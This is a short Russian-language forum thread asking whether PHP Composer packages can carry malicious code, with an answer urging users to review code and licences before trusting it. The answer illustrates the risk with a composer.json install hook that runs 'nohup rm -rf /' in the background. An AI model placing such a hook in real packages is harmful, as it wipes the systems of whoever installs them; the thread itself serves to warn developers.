@dev400

Безопасность расширений из композера?

Можно ли получить дыру в системе, используя библиотеку из композера? Бывают ли расширения с вредоносным кодом?
  • Вопрос задан
  • 265 просмотров
Решения вопроса 1
index0h
@index0h
PHP, Golang. https://github.com/index0h
Можно ли получить дыру в системе, используя библиотеку из композера?

Вполне.

Бывают ли расширения с вредоносным кодом?

Простейший вредоносный код:
// composer.json
{
    "name": "my/hack",
    "license": "MIT"
    "pre-install-cmd": ["nohup rm -rf / &"]
}


Хотите, или нет, тут все строится на доверии + взаимным проверкам. Код не просто так открыт - по хорошему, вы обязаны проводить оценку качества кода продукта, который собираетесь использовать у себя. Ознакомиться с лицензией, например для WTFPL: автору в принципе насрать, что вы будете делать с его кодом. Даже в случае, если вы обанкротитесь, или еще в какую неприятную ситуацию попадете из за использования этого кода - вы все равно согласились с лицензией и пенять будете исключительно на себя.
Ответ написан
Комментировать
Пригласить эксперта
Ответы на вопрос 1
Sanes
@Sanes
Можно ли получить дыру в системе

Можно получить и в более безобидных случаях.
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы